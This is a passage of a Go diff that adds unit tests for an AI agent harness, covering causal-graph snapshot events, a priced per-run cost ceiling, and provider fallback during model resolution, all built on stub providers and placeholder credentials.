+//   - The terminal asymmetry: the graph IS emitted on normal completion paths
+//     and on the failRunMaxSteps path, but is ABSENT on the generic failRun
+//     provider-error path (asserted below so the asymmetry is documented by a
+//     test rather than assumed).
+// --------------------------------------------------------------------------
+
+// causalSnapshotEvents returns all EventCausalGraphSnapshot events for a run,
+// in emission order.
+func causalSnapshotEvents(events []Event) []Event {
+	var out []Event
+	for _, ev := range events {
+		if ev.Type == EventCausalGraphSnapshot {
+			out = append(out, ev)
+		}
+	}
+	return out
+}
+
+// TestCausalGraphSnapshotEmittedAtRunEndWhenEnabled verifies that a run with
+// CausalGraphEnabled=true emits a causal.graph.snapshot as its terminal causal
+// event, carrying a meaningful graph payload: multiple LLM turns, a tool-call
+// node, and at least one context edge linking the recorded tool result to the
+// turn that consumed it.
+func TestCausalGraphSnapshotEmittedAtRunEndWhenEnabled(t *testing.T) {
+	t.Parallel()
+
+	registry := NewRegistry()
+	_ = registry.Register(ToolDefinition{
+		Name:        "noop_cg",
+		Description: "does nothing",
+		Parameters:  map[string]any{"type": "object", "properties": map[string]any{}},
+	}, func(_ context.Context, _ json.RawMessage) (string, error) {
+		return "tool-output", nil
+	})
+
+	// Step 1: a tool call (records a tool_call node + tool result).
+	// Step 2: no tool calls + content → run completes (records a second turn
+	// whose context includes the step-1 tool result, producing a context edge).
+	prov := &stubProvider{turns: []CompletionResult{
+		{ToolCalls: []ToolCall{{ID: "c1", Name: "noop_cg", Arguments: `{}`}}},
+		{Content: "done"},
+	}}
+
+	runner := NewRunner(prov, registry, RunnerConfig{
+		DefaultModel:       "test-model",
+		MaxSteps:           10,
+		CausalGraphEnabled: true,
+	})
+
+	run, err := runner.StartRun(RunRequest{Prompt: "test causal graph"})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusCompleted, RunStatusFailed)
+
+	events := collectEvents(t, runner, run.ID)
+	snapshots := causalSnapshotEvents(events)
+	if len(snapshots) == 0 {
+		t.Fatal("expected at least one causal.graph.snapshot when CausalGraphEnabled=true, got none")
+	}
+
+	// The terminal causal event must be a snapshot: the LAST snapshot is the
+	// run-end emission. Assert no run-terminal event (run.completed) precedes it
+	// without a trailing snapshot — i.e. a snapshot is the final causal artifact.
+	last := snapshots[len(snapshots)-1]
+
+	// The run-end snapshot must be emitted at or before the run.completed event.
+	// Confirm the run completed (not failed) and a snapshot exists in the stream.
+	var completedIdx, lastSnapshotIdx = -1, -1
+	for i, ev := range events {
+		switch ev.Type {
+		case EventRunCompleted:
+			completedIdx = i
+		case EventCausalGraphSnapshot:
+			lastSnapshotIdx = i
+		}
+	}
+	if completedIdx < 0 {
+		t.Fatalf("expected a run.completed event, got none; statuses=%v", eventTypes(events))
+	}
+	if lastSnapshotIdx < 0 {
+		t.Fatal("expected a causal.graph.snapshot event in the stream")
+	}
+	// The terminal snapshot is emitted immediately before completeRun, so it
+	// must precede run.completed in the stream.
+	if lastSnapshotIdx > completedIdx {
+		t.Errorf("expected terminal causal.graph.snapshot (idx %d) to precede run.completed (idx %d)",
+			lastSnapshotIdx, completedIdx)
+	}
+
+	// --- Payload shape: meaningful turns/edges/context ids. ---
+
+	// step field present and positive.
+	if step := payloadInt(last.Payload, "step"); step <= 0 {
+		t.Errorf("snapshot step: got %d, want > 0", step)
+	}
+
+	graph, ok := last.Payload["graph"].(map[string]any)
+	if !ok {
+		t.Fatalf("snapshot graph: got %T, want map[string]any", last.Payload["graph"])
+	}
+
+	nodes, ok := graph["nodes"].([]any)
+	if !ok {
+		t.Fatalf("graph nodes: got %T, want []any", graph["nodes"])
+	}
+	// Expect at least: turn-1, tool-call node c1, turn-2.
+	if len(nodes) < 3 {
+		t.Errorf("graph nodes: got %d, want >= 3 (turn-1, tool-call, turn-2)", len(nodes))
+	}
+
+	// Verify the graph contains both an llm_turn node and a tool_call node.
+	var sawTurn, sawToolCall bool
+	for _, n := range nodes {
+		nm, ok := n.(map[string]any)
+		if !ok {
+			continue
+		}
+		switch nm["type"] {
+		case "llm_turn":
+			sawTurn = true
+		case "tool_call":
+			sawToolCall = true
+			if nm["tool_name"] != "noop_cg" {
+				t.Errorf("tool_call node tool_name: got %v, want noop_cg", nm["tool_name"])
+			}
+		}
+	}
+	if !sawTurn {
+		t.Error("graph nodes missing an llm_turn node")
+	}
+	if !sawToolCall {
+		t.Error("graph nodes missing a tool_call node")
+	}
+
+	edges, ok := graph["edges"].([]any)
+	if !ok {
+		t.Fatalf("graph edges: got %T, want []any", graph["edges"])
+	}
+	if len(edges) == 0 {
+		t.Fatal("graph edges: got 0, want >= 1 (context edge from tool result to consuming turn)")
+	}
+	// At least one edge should be a context edge whose target is an llm turn and
+	// whose source is the step-1 tool call id (the context id fed into turn-2).
+	var sawContextEdgeToTurn bool
+	for _, e := range edges {
+		em, ok := e.(map[string]any)
+		if !ok {
+			continue
+		}
+		if em["type"] == "context" && em["to"] == "turn-2" && em["from"] == "c1" {
+			sawContextEdgeToTurn = true
+		}
+	}
+	if !sawContextEdgeToTurn {
+		t.Errorf("expected a context edge {from:c1, to:turn-2}; edges=%v", edges)
+	}
+}
+
+// TestCausalGraphSnapshotNotEmittedWhenDisabled verifies that no
+// causal.graph.snapshot event is emitted when CausalGraphEnabled=false (the
+// default), even for a run that exercises tool calls and multiple turns.
+func TestCausalGraphSnapshotNotEmittedWhenDisabled(t *testing.T) {
+	t.Parallel()
+
+	registry := NewRegistry()
+	_ = registry.Register(ToolDefinition{
+		Name:        "noop_cg_disabled",
+		Description: "does nothing",
+		Parameters:  map[string]any{"type": "object", "properties": map[string]any{}},
+	}, func(_ context.Context, _ json.RawMessage) (string, error) {
+		return "tool-output", nil
+	})
+
+	prov := &stubProvider{turns: []CompletionResult{
+		{ToolCalls: []ToolCall{{ID: "c1", Name: "noop_cg_disabled", Arguments: `{}`}}},
+		{Content: "done"},
+	}}
+
+	// CausalGraphEnabled NOT set → defaults to false.
+	runner := NewRunner(prov, registry, RunnerConfig{
+		DefaultModel: "test-model",
+		MaxSteps:     10,
+	})
+
+	run, err := runner.StartRun(RunRequest{Prompt: "test"})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusCompleted, RunStatusFailed)
+
+	events := collectEvents(t, runner, run.ID)
+	if snaps := causalSnapshotEvents(events); len(snaps) != 0 {
+		t.Errorf("expected no causal.graph.snapshot when CausalGraphEnabled=false, got %d", len(snaps))
+	}
+}
+
+// TestCausalGraphSnapshotAbsentOnProviderErrorFailRun locks in the current,
+// observed terminal asymmetry: when a run fails via the generic failRun
+// provider-error path (provider Complete returns an error), NO
+// causal.graph.snapshot is emitted, even with CausalGraphEnabled=true. The
+// emitCausalGraph call only appears on normal-completion paths, the empty-
+// response-retry continue site, the cost-ceiling completion, and the
+// failRunMaxSteps tail — it is absent from failRun. This test documents that
+// asymmetry so a future refactor that changes it is caught.
+func TestCausalGraphSnapshotAbsentOnProviderErrorFailRun(t *testing.T) {
+	t.Parallel()
+
+	prov := &errorProvider{err: errors.New("simulated provider outage")}
+
+	runner := NewRunner(prov, NewRegistry(), RunnerConfig{
+		DefaultModel:       "test-model",
+		MaxSteps:           10,
+		CausalGraphEnabled: true,
+	})
+
+	run, err := runner.StartRun(RunRequest{Prompt: "test"})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusFailed)
+
+	events := collectEvents(t, runner, run.ID)
+
+	// Confirm the run actually failed (so we are exercising the failRun path).
+	var sawFailed bool
+	for _, ev := range events {
+		if ev.Type == EventRunFailed {
+			sawFailed = true
+		}
+	}
+	if !sawFailed {
+		t.Fatalf("expected a run.failed event on the provider-error path; got %v", eventTypes(events))
+	}
+
+	// Assert the ACTUAL behavior: the causal graph snapshot is ABSENT on the
+	// generic failRun provider-error path.
+	if snaps := causalSnapshotEvents(events); len(snaps) != 0 {
+		t.Errorf("expected NO causal.graph.snapshot on the failRun provider-error path "+
+			"(documenting current asymmetry), got %d", len(snaps))
+	}
+}

--- a/internal/harness/runner_cost_ceiling_test.go
+++ b/internal/harness/runner_cost_ceiling_test.go
@@ -1,0 +1,465 @@
+package harness
+
+// runner_cost_ceiling_test.go — deep behavioral tests for the priced
+// max_cost_usd ceiling.
+//
+// Design notes:
+//   - Uses file-unique inline provider stubs (costCeilingPricedProvider,
+//     costCeilingUnpricedProvider) to avoid importing fakeprovider (which would
+//     create an import cycle: fakeprovider→harness).
+//   - floatPtr is defined in runner_test.go (same package); reuse it here.
+//   - collectRunEvents, requireEventOrder, eventTypes are defined in runner_test.go.
+//   - assertNoRunnerGoroutineLeak is defined in runner_shutdown_test.go; do NOT
+//     redeclare it here.
+
+import (
+	"context"
+	"encoding/json"
+	"sync"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+// costCeilingPricedProvider is a file-unique inline provider stub scripted with
+// multiple turns, each returning a priced CompletionResult
+// (Cost.TotalUSD > 0, CostStatus = CostStatusAvailable).
+// A tool call is returned on turns 1..N-1 so the loop keeps going; the final
+// turn (which should never be reached) returns plain content.
+type costCeilingPricedProvider struct {
+	mu    sync.Mutex
+	turns []CompletionResult
+	calls int
+}
+
+func (p *costCeilingPricedProvider) Complete(_ context.Context, req CompletionRequest) (CompletionResult, error) {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	if p.calls >= len(p.turns) {
+		return CompletionResult{}, nil
+	}
+	turn := p.turns[p.calls]
+	p.calls++
+	if req.Stream != nil {
+		for _, delta := range turn.Deltas {
+			req.Stream(delta)
+		}
+	}
+	return turn, nil
+}
+
+func (p *costCeilingPricedProvider) Calls() int {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	return p.calls
+}
+
+// costCeilingUnpricedProvider returns turns whose CostStatus is NOT
+// CostStatusAvailable (i.e. the model is unpriced), so the ceiling must
+// never fire even when max_cost_usd is very small.
+type costCeilingUnpricedProvider struct {
+	mu    sync.Mutex
+	turns []CompletionResult
+	calls int
+}
+
+func (p *costCeilingUnpricedProvider) Complete(_ context.Context, req CompletionRequest) (CompletionResult, error) {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	if p.calls >= len(p.turns) {
+		return CompletionResult{}, nil
+	}
+	turn := p.turns[p.calls]
+	p.calls++
+	if req.Stream != nil {
+		for _, delta := range turn.Deltas {
+			req.Stream(delta)
+		}
+	}
+	return turn, nil
+}
+
+func (p *costCeilingUnpricedProvider) Calls() int {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	return p.calls
+}
+
+// registerEchoTool registers an "echo_json" tool on registry and returns it.
+// Shared by the sub-tests below.
+func registerEchoTool(t *testing.T, registry *Registry) {
+	t.Helper()
+	err := registry.Register(ToolDefinition{
+		Name:        "echo_json",
+		Description: "echoes payload",
+		Parameters: map[string]any{
+			"type":       "object",
+			"properties": map[string]any{},
+		},
+	}, func(_ context.Context, _ json.RawMessage) (string, error) {
+		return `{}`, nil
+	})
+	require.NoError(t, err, "register echo_json tool")
+}
+
+// TestCostCeilingDeep_PricedCeilingContract is the primary proof:
+// a priced max_cost_usd ceiling triggers run.cost_limit_reached and the run
+// terminates with RunStatusCompleted (not failed/cancelled).
+//
+// Contract assertions (from the plan's "Priced cost-ceiling contract"):
+//  1. EventRunCostLimitReached is emitted with payload: step, max_cost_usd,
+//     cumulative_cost_usd.
+//  2. Event ORDER on the triggering turn:
+//     usage.delta → llm.turn.completed → run.cost_limit_reached →
+//     run.step.completed → run.completed.
+//  3. Final Run.Status == RunStatusCompleted; run.failed and run.cancelled absent.
+//  4. Run.CostTotals.CostStatus == CostStatusAvailable and CostUSDTotal >= 0.003.
+func TestCostCeilingDeep_PricedCeilingContract(t *testing.T) {
+	t.Parallel()
+
+	// Two priced turns at $0.002 each. Ceiling is $0.003.
+	// After turn 1: cumulative = $0.002 < $0.003 → continue.
+	// After turn 2: cumulative = $0.004 >= $0.003 → ceiling fires.
+	// Turn 3 must NEVER be reached.
+	prov := &costCeilingPricedProvider{
+		turns: []CompletionResult{
+			{
+				ToolCalls:  []ToolCall{{ID: "call-1", Name: "echo_json", Arguments: `{}`}},
+				Cost:       &CompletionCost{TotalUSD: 0.002},
+				CostStatus: CostStatusAvailable,
+				Usage:      &CompletionUsage{PromptTokens: 10, CompletionTokens: 5, TotalTokens: 15},
+			},
+			{
+				ToolCalls:  []ToolCall{{ID: "call-2", Name: "echo_json", Arguments: `{}`}},
+				Cost:       &CompletionCost{TotalUSD: 0.002},
+				CostStatus: CostStatusAvailable,
+				Usage:      &CompletionUsage{PromptTokens: 10, CompletionTokens: 5, TotalTokens: 15},
+			},
+			// Turn 3: should never be reached.
+			{Content: "unreachable"},
+		},
+	}
+
+	registry := NewRegistry()
+	registerEchoTool(t, registry)
+
+	runner := NewRunner(prov, registry, RunnerConfig{
+		DefaultModel: "gpt-4.1-mini",
+		MaxSteps:     10,
+	})
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:     "hello",
+		MaxCostUSD: 0.003,
+	})
+	require.NoError(t, err, "start run")
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	require.NoError(t, err, "collect events")
+
+	// 1. Locate the cost_limit_reached event.
+	var costLimitIdx int = -1
+	for i, ev := range events {
+		if ev.Type == EventRunCostLimitReached {
+			costLimitIdx = i
+			break
+		}
+	}
+	require.NotEqual(t, -1, costLimitIdx, "expected run.cost_limit_reached event; got events: %v", eventTypes(events))
+
+	// 1a. Payload fields.
+	payload := events[costLimitIdx].Payload
+	assert.NotNil(t, payload["step"], "cost_limit_reached payload must carry 'step'")
+	assert.NotNil(t, payload["max_cost_usd"], "cost_limit_reached payload must carry 'max_cost_usd'")
+	assert.NotNil(t, payload["cumulative_cost_usd"], "cost_limit_reached payload must carry 'cumulative_cost_usd'")
+
+	// max_cost_usd in the payload must equal the requested ceiling.
+	maxCostVal, _ := payload["max_cost_usd"].(float64)
+	assert.InDelta(t, 0.003, maxCostVal, 1e-12, "payload max_cost_usd must match request ceiling")
+
+	// cumulative_cost_usd must be >= the ceiling (0.003).
+	cumCostVal, _ := payload["cumulative_cost_usd"].(float64)
+	assert.GreaterOrEqual(t, cumCostVal, 0.003, "payload cumulative_cost_usd must be >= max_cost_usd")
+
+	// 2. Event ORDER on the triggering turn:
+	//    usage.delta → llm.turn.completed → run.cost_limit_reached →
+	//    run.step.completed → run.completed.
+	//
+	// We verify this within the exact window of the triggering turn to close the
+	// first-occurrence mutation gap: requireEventOrder records only first
+	// occurrences, and usage.delta / llm.turn.completed fire on every turn
+	// (including pre-trigger turns), so a full-list check could pass even if
+	// those events were missing on the triggering turn.
+	//
+	// Window: find the last run.step.completed that appears BEFORE
+	// cost_limit_reached — that marks the end of the previous step. The events
+	// from that index onward form the triggering-turn slice. All five events must
+	// appear in order within that slice.
+	require.NotEqual(t, -1, costLimitIdx, "cost_limit_reached must be present (already asserted above)")
+
+	lastStepCompletedBeforeCeiling := -1
+	for i := 0; i < costLimitIdx; i++ {
+		if events[i].Type == EventRunStepCompleted {
+			lastStepCompletedBeforeCeiling = i
+		}
+	}
+	// If no prior run.step.completed exists (first step triggered), start from 0.
+	triggerStart := 0
+	if lastStepCompletedBeforeCeiling >= 0 {
+		triggerStart = lastStepCompletedBeforeCeiling + 1
+	}
+	triggerSlice := events[triggerStart:]
+	requireEventOrder(t, triggerSlice,
+		string(EventUsageDelta),
+		string(EventLLMTurnCompleted),
+		string(EventRunCostLimitReached),
+		string(EventRunStepCompleted),
+		string(EventRunCompleted),
+	)
+
+	// 3. run.failed and run.cancelled must NOT appear.
+	for _, ev := range events {
+		assert.NotEqual(t, EventRunFailed, ev.Type, "run.failed must NOT be emitted on cost ceiling")
+		assert.NotEqual(t, EventRunCancelled, ev.Type, "run.cancelled must NOT be emitted on cost ceiling")
+	}
+
+	// Terminal event must be run.completed.
+	var terminalType EventType
+	for _, ev := range events {
+		if IsTerminalEvent(ev.Type) {
+			terminalType = ev.Type
+		}
+	}
+	assert.Equal(t, EventRunCompleted, terminalType, "terminal event must be run.completed")
+
+	// 4. Final run state.
+	state, ok := runner.GetRun(run.ID)
+	require.True(t, ok, "run must exist in runner store")
+	assert.Equal(t, RunStatusCompleted, state.Status, "run.Status must be RunStatusCompleted")
+
+	require.NotNil(t, state.CostTotals, "CostTotals must be populated")
+	assert.Equal(t, CostStatusAvailable, state.CostTotals.CostStatus,
+		"CostTotals.CostStatus must be CostStatusAvailable")
+	assert.GreaterOrEqual(t, state.CostTotals.CostUSDTotal, 0.003,
+		"CostTotals.CostUSDTotal must be >= 0.003 (ceiling was crossed)")
+
+	// Provider must have been called exactly twice (ceiling hits after turn 2).
+	assert.Equal(t, 2, prov.Calls(), "provider must be called exactly 2 times")
+}
+
+// TestCostCeilingDeep_UnpricedDoesNotTrigger is the control sub-test:
+// when CostStatus != CostStatusAvailable (unpriced model), the ceiling must
+// NEVER fire and the run must proceed to normal completion.
+func TestCostCeilingDeep_UnpricedDoesNotTrigger(t *testing.T) {
+	t.Parallel()
+
+	// Three turns with CostStatusUnpricedModel (no pricing data).
+	// max_cost_usd is set very low (0.001) — but since cost is unpriced,
+	// the ceiling must never trip.
+	prov := &costCeilingUnpricedProvider{
+		turns: []CompletionResult{
+			{
+				ToolCalls:  []ToolCall{{ID: "u1", Name: "echo_json", Arguments: `{}`}},
+				CostStatus: CostStatusUnpricedModel,
+				Usage:      &CompletionUsage{PromptTokens: 5, CompletionTokens: 3, TotalTokens: 8},
+			},
+			{
+				ToolCalls:  []ToolCall{{ID: "u2", Name: "echo_json", Arguments: `{}`}},
+				CostStatus: CostStatusUnpricedModel,
+				Usage:      &CompletionUsage{PromptTokens: 5, CompletionTokens: 3, TotalTokens: 8},
+			},
+			{
+				Content:    "done — unpriced",
+				CostStatus: CostStatusUnpricedModel,
+				Usage:      &CompletionUsage{PromptTokens: 5, CompletionTokens: 3, TotalTokens: 8},
+			},
+		},
+	}
+
+	registry := NewRegistry()
+	registerEchoTool(t, registry)
+
+	runner := NewRunner(prov, registry, RunnerConfig{
+		DefaultModel: "gpt-4.1-mini",
+		MaxSteps:     10,
+	})
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:     "hello",
+		MaxCostUSD: 0.001, // tiny ceiling; cost is unpriced so must never fire
+	})
+	require.NoError(t, err, "start run")
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	require.NoError(t, err, "collect events")
+
+	// run.cost_limit_reached must NOT appear.
+	for _, ev := range events {
+		assert.NotEqual(t, EventRunCostLimitReached, ev.Type,
+			"run.cost_limit_reached must NOT fire for unpriced model; got events: %v", eventTypes(events))
+	}
+
+	// Run must complete normally (not fail).
+	state, ok := runner.GetRun(run.ID)
+	require.True(t, ok, "run must exist in runner store")
+	assert.Equal(t, RunStatusCompleted, state.Status,
+		"unpriced run must complete normally despite low max_cost_usd")
+
+	// Shut down cleanly.
+	require.NoError(t, runner.Shutdown(context.Background()))
+}
+
+// TestCostCeilingDeep_ProviderUnreportedDoesNotTrigger ensures that
+// CostStatusProviderUnreported (another non-available status) also never
+// triggers the ceiling.
+func TestCostCeilingDeep_ProviderUnreportedDoesNotTrigger(t *testing.T) {
+	t.Parallel()
+
+	prov := &costCeilingUnpricedProvider{
+		turns: []CompletionResult{
+			{
+				Content:    "turn 1",
+				CostStatus: CostStatusProviderUnreported,
+				Usage:      &CompletionUsage{PromptTokens: 5, CompletionTokens: 3, TotalTokens: 8},
+			},
+			{
+				Content:    "done",
+				CostStatus: CostStatusProviderUnreported,
+				Usage:      &CompletionUsage{PromptTokens: 5, CompletionTokens: 3, TotalTokens: 8},
+			},
+		},
+	}
+
+	runner := NewRunner(prov, NewRegistry(), RunnerConfig{
+		DefaultModel: "gpt-4.1-mini",
+		MaxSteps:     10,
+	})
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:     "hello",
+		MaxCostUSD: 0.0001, // very low ceiling; cost is provider-unreported so must never fire
+	})
+	require.NoError(t, err, "start run")
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	require.NoError(t, err, "collect events")
+
+	for _, ev := range events {
+		assert.NotEqual(t, EventRunCostLimitReached, ev.Type,
+			"run.cost_limit_reached must NOT fire for provider_unreported cost status")
+	}
+
+	state, ok := runner.GetRun(run.ID)
+	require.True(t, ok, "run must exist in runner store")
+	assert.Equal(t, RunStatusCompleted, state.Status,
+		"provider_unreported cost run must complete normally")
+}
+
+// TestCostCeilingDeep_CostViaCompletionCost verifies that cost reported via
+// Cost.TotalUSD (not CostUSD *float64) also drives the ceiling correctly.
+func TestCostCeilingDeep_CostViaCompletionCost(t *testing.T) {
+	t.Parallel()
+
+	// Each turn reports $0.002 via the Cost struct (not CostUSD).
+	// Ceiling is $0.003 → second turn crosses it.
+	prov := &costCeilingPricedProvider{
+		turns: []CompletionResult{
+			{
+				ToolCalls:  []ToolCall{{ID: "cc1", Name: "echo_json", Arguments: `{}`}},
+				Cost:       &CompletionCost{TotalUSD: 0.002},
+				CostStatus: CostStatusAvailable,
+			},
+			{
+				ToolCalls:  []ToolCall{{ID: "cc2", Name: "echo_json", Arguments: `{}`}},
+				Cost:       &CompletionCost{TotalUSD: 0.002},
+				CostStatus: CostStatusAvailable,
+			},
+			{Content: "unreachable"},
+		},
+	}
+
+	registry := NewRegistry()
+	registerEchoTool(t, registry)
+
+	runner := NewRunner(prov, registry, RunnerConfig{
+		DefaultModel: "gpt-4.1-mini",
+		MaxSteps:     10,
+	})
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:     "hello",
+		MaxCostUSD: 0.003,
+	})
+	require.NoError(t, err, "start run")
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	require.NoError(t, err, "collect events")
+
+	var sawCostLimit bool
+	for _, ev := range events {
+		if ev.Type == EventRunCostLimitReached {
+			sawCostLimit = true
+		}
+	}
+	assert.True(t, sawCostLimit, "run.cost_limit_reached must fire when cost is reported via Cost.TotalUSD")
+
+	state, ok := runner.GetRun(run.ID)
+	require.True(t, ok, "run must exist in runner store")
+	assert.Equal(t, RunStatusCompleted, state.Status, "run must complete (not fail)")
+	require.NotNil(t, state.CostTotals)
+	assert.Equal(t, CostStatusAvailable, state.CostTotals.CostStatus)
+	assert.GreaterOrEqual(t, state.CostTotals.CostUSDTotal, 0.003)
+}
+
+// TestCostCeilingDeep_CostViaFloatPtr verifies that cost reported via CostUSD *float64
+// (not Cost struct) also drives the ceiling correctly. normalizeTurnCost uses
+// *result.CostUSD when Cost.TotalUSD would otherwise be 0, as the last writer wins.
+func TestCostCeilingDeep_CostViaFloatPtr(t *testing.T) {
+	t.Parallel()
+
+	prov := &costCeilingPricedProvider{
+		turns: []CompletionResult{
+			{
+				ToolCalls:  []ToolCall{{ID: "fp1", Name: "echo_json", Arguments: `{}`}},
+				CostUSD:    floatPtr(0.002),
+				CostStatus: CostStatusAvailable,
+			},
+			{
+				ToolCalls:  []ToolCall{{ID: "fp2", Name: "echo_json", Arguments: `{}`}},
+				CostUSD:    floatPtr(0.002),
+				CostStatus: CostStatusAvailable,
+			},
+			{Content: "unreachable"},
+		},
+	}
+
+	registry := NewRegistry()
+	registerEchoTool(t, registry)
+
+	runner := NewRunner(prov, registry, RunnerConfig{
+		DefaultModel: "gpt-4.1-mini",
+		MaxSteps:     10,
+	})
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:     "hello",
+		MaxCostUSD: 0.003,
+	})
+	require.NoError(t, err, "start run")
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	require.NoError(t, err, "collect events")
+
+	var sawCostLimit bool
+	for _, ev := range events {
+		if ev.Type == EventRunCostLimitReached {
+			sawCostLimit = true
+		}
+	}
+	assert.True(t, sawCostLimit, "run.cost_limit_reached must fire when cost is reported via CostUSD *float64")
+
+	state, ok := runner.GetRun(run.ID)
+	require.True(t, ok, "run must exist in runner store")
+	assert.Equal(t, RunStatusCompleted, state.Status, "run must complete (not fail)")
+}

--- a/internal/harness/runner_fallback_resolution_test.go
+++ b/internal/harness/runner_fallback_resolution_test.go
@@ -1,0 +1,302 @@
+package harness
+
+// Resolution-time fallback tests for provider selection.
+//
+// This file guards the EXISTING resolution-time fallback behavior (it must be
+// unchanged by the new runtime-fallback work). The runtime-fallback cases
+// already live in runner_fallback_test.go.
+//
+// NOTE: We cannot import fakeprovider here because that package imports
+// harness, which would create an import cycle. Instead, we define minimal
+// inline stubs that replicate the behaviour needed for these specific test
+// scenarios.
+
+import (
+	"context"
+	"sync"
+	"testing"
+
+	"go-agent-harness/internal/provider/catalog"
+
+	"github.com/stretchr/testify/require"
+)
+
+// resolutionTestProvider is a minimal harness.Provider stub for resolution tests.
+// It tracks how many times it was called.
+type resolutionTestProvider struct {
+	mu        sync.Mutex
+	callCount int
+}
+
+func (p *resolutionTestProvider) Complete(_ context.Context, req CompletionRequest) (CompletionResult, error) {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	p.callCount++
+	return CompletionResult{Content: "test response"}, nil
+}
+
+func (p *resolutionTestProvider) Calls() int {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	return p.callCount
+}
+
+// TestResolution_PreferredUnavailable_AllowFallbackTrue verifies:
+// Preferred provider unavailable (provider_name set to a name not in the registry / not
+// implementing Provider) + AllowFallback:true -> the run resolves to a fallback
+// and emits a prompt.warning with code "provider_fallback", and the run still completes.
+// When no model is available in the registry, it falls back to the default provider.
+func TestResolution_PreferredUnavailable_AllowFallbackTrue(t *testing.T) {
+	t.Parallel()
+
+	defaultProvider := &resolutionTestProvider{}
+
+	// Create a catalog with a provider that has a DIFFERENT model,
+	// so when preferred provider is unavailable, GetClientForModel("test-model")
+	// will fail and trigger fallback to default provider.
+	cat := &catalog.Catalog{
+		CatalogVersion: "1.0",
+		Providers: map[string]catalog.ProviderEntry{
+			"available-provider": {
+				DisplayName: "available-provider",
+				BaseURL:     "https://api.example.com",
+				APIKeyEnv:   "TEST_API_KEY",
+				Protocol:    "openai",
+				Models: map[string]catalog.Model{
+					"other-model": {
+						DisplayName:   "other-model",
+						ContextWindow: 128000,
+						ToolCalling:   true,
+						Streaming:     true,
+					},
+				},
+			},
+		},
+	}
+
+	reg := catalog.NewProviderRegistryWithEnv(cat, func(key string) string {
+		if key == "TEST_API_KEY" {
+			return "sk-test-fake"
+		}
+		return ""
+	})
+
+	reg.SetClientFactory(func(_, _, providerName string) (catalog.ProviderClient, error) {
+		if providerName == "available-provider" {
+			return &resolutionTestProvider{}, nil
+		}
+		return nil, nil
+	})
+
+	runner := NewRunner(defaultProvider, NewRegistry(), RunnerConfig{
+		DefaultModel:     "test-model",
+		MaxSteps:         2,
+		ProviderRegistry: reg,
+	})
+
+	// Request a provider that does not exist in the registry, with a model not in the registry
+	run, err := runner.StartRun(RunRequest{
+		Prompt:        "hello",
+		Model:         "test-model", // This model is not in the registry
+		ProviderName:  "nonexistent-provider",
+		AllowFallback: true,
+	})
+	require.NoError(t, err)
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	require.NoError(t, err)
+
+	// Run must complete (not fail).
+	state, ok := runner.GetRun(run.ID)
+	require.True(t, ok)
+	require.Equal(t, RunStatusCompleted, state.Status,
+		"run must complete when preferred provider unavailable + AllowFallback:true; got events: %v", eventTypes(events))
+
+	// At least one prompt.warning with code=provider_fallback must appear
+	// (may be two: one for preferred provider, one for model).
+	var foundFallbackWarning bool
+	for _, ev := range events {
+		if ev.Type == EventPromptWarning {
+			if code, _ := ev.Payload["code"].(string); code == "provider_fallback" {
+				foundFallbackWarning = true
+			}
+		}
+	}
+	require.True(t, foundFallbackWarning,
+		"expected prompt.warning with code=provider_fallback; got events: %v", eventTypes(events))
+
+	// The default provider should have been used.
+	require.Equal(t, 1, defaultProvider.Calls(), "default provider must be used")
+}
+
+// TestResolution_PreferredUnavailable_AllowFallbackFalse verifies:
+// Preferred provider unavailable + AllowFallback:false -> the run errors/fails at resolution
+// (unchanged behavior).
+func TestResolution_PreferredUnavailable_AllowFallbackFalse(t *testing.T) {
+	t.Parallel()
+
+	defaultProvider := &resolutionTestProvider{}
+	registryProvider := &resolutionTestProvider{}
+
+	cat := &catalog.Catalog{
+		CatalogVersion: "1.0",
+		Providers: map[string]catalog.ProviderEntry{
+			"available-provider": {
+				DisplayName: "available-provider",
+				BaseURL:     "https://api.example.com",
+				APIKeyEnv:   "TEST_API_KEY",
+				Protocol:    "openai",
+				Models: map[string]catalog.Model{
+					"test-model": {
+						DisplayName:   "test-model",
+						ContextWindow: 128000,
+						ToolCalling:   true,
+						Streaming:     true,
+					},
+				},
+			},
+		},
+	}
+
+	reg := catalog.NewProviderRegistryWithEnv(cat, func(key string) string {
+		if key == "TEST_API_KEY" {
+			return "sk-test-fake"
+		}
+		return ""
+	})
+
+	reg.SetClientFactory(func(_, _, providerName string) (catalog.ProviderClient, error) {
+		if providerName == "available-provider" {
+			return registryProvider, nil
+		}
+		return nil, nil
+	})
+
+	runner := NewRunner(defaultProvider, NewRegistry(), RunnerConfig{
+		DefaultModel:     "test-model",
+		MaxSteps:         2,
+		ProviderRegistry: reg,
+	})
+
+	// Request a provider that does not exist in the registry, with AllowFallback:false
+	run, err := runner.StartRun(RunRequest{
+		Prompt:        "hello",
+		Model:         "test-model",
+		ProviderName:  "nonexistent-provider",
+		AllowFallback: false,
+	})
+	require.NoError(t, err)
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	require.NoError(t, err)
+
+	// Run must fail at resolution.
+	state, ok := runner.GetRun(run.ID)
+	require.True(t, ok)
+	require.Equal(t, RunStatusFailed, state.Status,
+		"run must fail when preferred provider unavailable + AllowFallback:false; got events: %v", eventTypes(events))
+
+	requireEventOrder(t, events, "run.failed")
+
